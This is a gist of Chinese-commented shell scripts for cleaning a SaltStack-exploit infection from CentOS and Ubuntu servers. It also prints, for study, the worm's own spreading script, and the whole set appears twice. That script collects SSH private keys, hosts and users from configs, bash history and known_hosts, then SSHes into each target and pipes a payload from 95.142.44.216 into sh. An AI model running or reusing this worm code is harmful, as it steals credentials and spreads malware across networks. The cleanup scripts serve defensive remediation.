daimon99/killvirus-centos.sh

## killvirus-centos.sh
# centos 修复脚本
ps -elf|grep salt|awk '{print $4}' | xargs kill -9

for i in /var/spool/cron/*;do sed -i "/wget/d" $i;sed -i "/salt/d" $i;done
systemctl stop salt-minion
systemctl disable salt-minion
systemctl stop salt-master
systemctl disable salt-master


rm -f /root/.ssh/authorized_keys;
echo "<替换为你自己的新信任公钥>" > ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;
for i in /home/*;do
  echo '--> delete authorized_keys for user' $i
  rm -f $i/.ssh/authorized_keys;
  user=${i##*home/};
  echo '-->' $user;
  sudo -u$user sh -c 'echo "<替换为你自己的新信任公钥>" > '${i}'/.ssh/authorized_keys;chmod 600 '${i}'/.ssh/authorized_keys';
done

rm -f /tmp/sal*

# 验证是否完成
# echo "--------> 1）看看 authorized_keys 是否加上私钥"
cat /home/pyer/.ssh/authorized_keys
# echo "--------> 2）检查是否还有异常 crontab 进程"
for i in /var/spool/cron/*;do cat $i;done;
# echo "--------> 3）检查是否 tmp 还有病毒文件"
ll /tmp/sa*
# echo "--------> 4）检查是否 还有异常进程"
ps -elf|grep salt
# echo "由于私钥泄露，建议所有服务器存有的明文密码全部修改"

## killvirus-ubuntu.sh

# ====================
# ubuntu 修复脚本
ps -elf|grep salt|awk '{print $4}' | xargs kill -9

for i in /var/spool/cron/crontabs/*;do sed -i "/wget/d" $i;sed -i "/salt/d" $i;done
systemctl stop salt-minion
systemctl disable salt-minion
systemctl stop salt-master
systemctl disable salt-master


rm -f /root/.ssh/authorized_keys;
echo "<替换为你自己的新信任公钥>" > ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;

for i in /home/*;do
  echo '--> delete authorized_keys for user' $i
  rm -f $i/.ssh/authorized_keys;
  user=${i##*home/};
  echo '-->' $user;
  sudo -u$user sh -c 'echo "<替换为你自己的新信任公钥>" > '${i}'/.ssh/authorized_keys;chmod 600 '${i}'/.ssh/authorized_keys';
done
rm -f /tmp/sal*

# 验证是否完成
# echo "--------> 1）看看 authorized_keys 是否加上私钥"
cat /root/.ssh/authorized_keys

# echo "--------> 2）检查是否还有异常 crontab 进程"
for i in /var/spool/cron/crontabs/*;do cat $i;done;
# echo "--------> 3）检查是否 tmp 还有病毒文件"
ll /tmp/sa*
# echo "--------> 4）检查是否 还有异常进程"
ps -elf|grep salt
# echo "由于私钥泄露，建议所有服务器存有的明文密码全部修改"

## virus.sh
# 这是病毒通过入侵 salt 漏洞后，通过私钥进一步扩散传染的脚本。可以用来学习研究。
#!/bin/sh
localgo() {
  myhostip=$(curl -sL icanhazip.com)
  KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
  KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
  KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
  KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
  HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
  HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
  HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
  HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
  HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
  USERZ=$(
    echo "root"
    find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq
  )
  USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
  pl=$(
    echo "22"
    cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}'
  )
  sshports=$(echo "$pl" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  i=0
  for user in $userlist; do
    for host in $hostlist; do
      for key in $keylist; do
        for sshp in $sshports; do
          i=$((i+1))
          if [ "${i}" -eq "20" ]; then
            sleep 20
            ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
            i=0
          fi
          #Wait 20 seconds after every 20 attempts and clean up hanging processes

          chmod +r $key
          chmod 400 $key
          echo "$user@$host $key $sshp"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http://95.142.44.216/s2.sh|sh; sudo wget -q -O - http://95.142.44.216/s2.sh|sh;"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "curl -L http://95.142.44.216/s2.sh|sh; wget -q -O - http://95.142.44.216/s2.sh|sh;"
        done
      done
    done
  done
}
localgo
	# centos 修复脚本
	ps -elf\|grep salt\|awk '{print $4}' \| xargs kill -9

	for i in /var/spool/cron/*;do sed -i "/wget/d" $i;sed -i "/salt/d" $i;done
	systemctl stop salt-minion
	systemctl disable salt-minion
	systemctl stop salt-master
	systemctl disable salt-master


	rm -f /root/.ssh/authorized_keys;
	echo "<替换为你自己的新信任公钥>" > ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;
	for i in /home/*;do
	echo '--> delete authorized_keys for user' $i
	rm -f $i/.ssh/authorized_keys;
	user=${i##*home/};
	echo '-->' $user;
	sudo -u$user sh -c 'echo "<替换为你自己的新信任公钥>" > '${i}'/.ssh/authorized_keys;chmod 600 '${i}'/.ssh/authorized_keys';
	done

	rm -f /tmp/sal*

	# 验证是否完成
	# echo "--------> 1）看看 authorized_keys 是否加上私钥"
	cat /home/pyer/.ssh/authorized_keys
	# echo "--------> 2）检查是否还有异常 crontab 进程"
	for i in /var/spool/cron/*;do cat $i;done;
	# echo "--------> 3）检查是否 tmp 还有病毒文件"
	ll /tmp/sa*
	# echo "--------> 4）检查是否还有异常进程"
	ps -elf\|grep salt
	# echo "由于私钥泄露，建议所有服务器存有的明文密码全部修改"

	# ====================
	# ubuntu 修复脚本
	ps -elf\|grep salt\|awk '{print $4}' \| xargs kill -9

	for i in /var/spool/cron/crontabs/*;do sed -i "/wget/d" $i;sed -i "/salt/d" $i;done
	systemctl stop salt-minion
	systemctl disable salt-minion
	systemctl stop salt-master
	systemctl disable salt-master


	rm -f /root/.ssh/authorized_keys;
	echo "<替换为你自己的新信任公钥>" > ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;

	for i in /home/*;do
	echo '--> delete authorized_keys for user' $i
	rm -f $i/.ssh/authorized_keys;
	user=${i##*home/};
	echo '-->' $user;
	sudo -u$user sh -c 'echo "<替换为你自己的新信任公钥>" > '${i}'/.ssh/authorized_keys;chmod 600 '${i}'/.ssh/authorized_keys';
	done
	rm -f /tmp/sal*

	# 验证是否完成
	# echo "--------> 1）看看 authorized_keys 是否加上私钥"
	cat /root/.ssh/authorized_keys

	# echo "--------> 2）检查是否还有异常 crontab 进程"
	for i in /var/spool/cron/crontabs/*;do cat $i;done;
	# echo "--------> 3）检查是否 tmp 还有病毒文件"
	ll /tmp/sa*
	# echo "--------> 4）检查是否还有异常进程"
	ps -elf\|grep salt
	# echo "由于私钥泄露，建议所有服务器存有的明文密码全部修改"
	# 这是病毒通过入侵 salt 漏洞后，通过私钥进一步扩散传染的脚本。可以用来学习研究。
	#!/bin/sh
	localgo() {
	myhostip=$(curl -sL icanhazip.com)
	KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' \| grep -vw pub)
	KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config \| grep IdentityFile \| awk -F "IdentityFile" '{print $2 }')
	KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history \| grep -E "(ssh\|scp)" \| awk -F ' -i ' '{print $2}' \| awk '{print $1'})
	KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' \| uniq)
	HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config \| grep HostName \| awk -F "HostName" '{print $2}')
	HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history \| grep -E "(ssh\|scp)" \| grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
	HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history \| grep -E "(ssh\|scp)" \| tr ':' ' ' \| awk -F '@' '{print $2}' \| awk -F '{print $1}')
	HOSTS4=$(cat /etc/hosts \| grep -vw "0.0.0.0" \| grep -vw "127.0.1.1" \| grep -vw "127.0.0.1" \| grep -vw $myhostip \| sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' \| awk '{print $1}')
	HOSTS5=$(cat ~//.ssh/known_hosts /home//.ssh/known_hosts /root/.ssh/known_hosts \| grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" \| uniq)
	HOSTS6=$(ps auxw \| grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" \| grep ":22" \| uniq)
	USERZ=$(
	echo "root"
	find ~/ /root /home -maxdepth 2 -name '\.ssh' \| uniq \| xargs find \| awk '/id_rsa/' \| awk -F'/' '{print $3}' \| uniq
	)
	USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history \| grep -vw "cp" \| grep -vw "mv" \| grep -vw "cd " \| grep -vw "nano" \| grep -v grep \| grep -E "(ssh\|scp)" \| tr ':' ' ' \| awk -F '@' '{print $1}' \| awk '{print $4}' \| uniq)
	pl=$(
	echo "22"
	cat ~/.bash_history /home/*/.bash_history /root/.bash_history \| grep -vw "cp" \| grep -vw "mv" \| grep -vw "cd " \| grep -vw "nano" \| grep -v grep \| grep -E "(ssh\|scp)" \| tr ':' ' ' \| awk -F '-p' '{print $2}'
	)
	sshports=$(echo "$pl" \| tr ' ' '\n' \| nl \| sort -u -k2 \| sort -n \| cut -f2-)
	userlist=$(echo "$USERZ $USERZ2" \| tr ' ' '\n' \| nl \| sort -u -k2 \| sort -n \| cut -f2-)
	hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" \| grep -vw 127.0.0.1 \| tr ' ' '\n' \| nl \| sort -u -k2 \| sort -n \| cut -f2-)
	keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" \| tr ' ' '\n' \| nl \| sort -u -k2 \| sort -n \| cut -f2-)
	i=0
	for user in $userlist; do
	for host in $hostlist; do
	for key in $keylist; do
	for sshp in $sshports; do
	i=$((i+1))
	if [ "${i}" -eq "20" ]; then
	sleep 20
	ps wx \| grep "ssh -o" \| awk '{print $1}' \| xargs kill -9 &>/dev/null &
	i=0
	fi
	#Wait 20 seconds after every 20 attempts and clean up hanging processes

	chmod +r $key
	chmod 400 $key
	echo "$user@$host $key $sshp"
	ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http://95.142.44.216/s2.sh\|sh; sudo wget -q -O - http://95.142.44.216/s2.sh\|sh;"
	ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "curl -L http://95.142.44.216/s2.sh\|sh; wget -q -O - http://95.142.44.216/s2.sh\|sh;"
	done
	done
	done
	done
	}
	localgo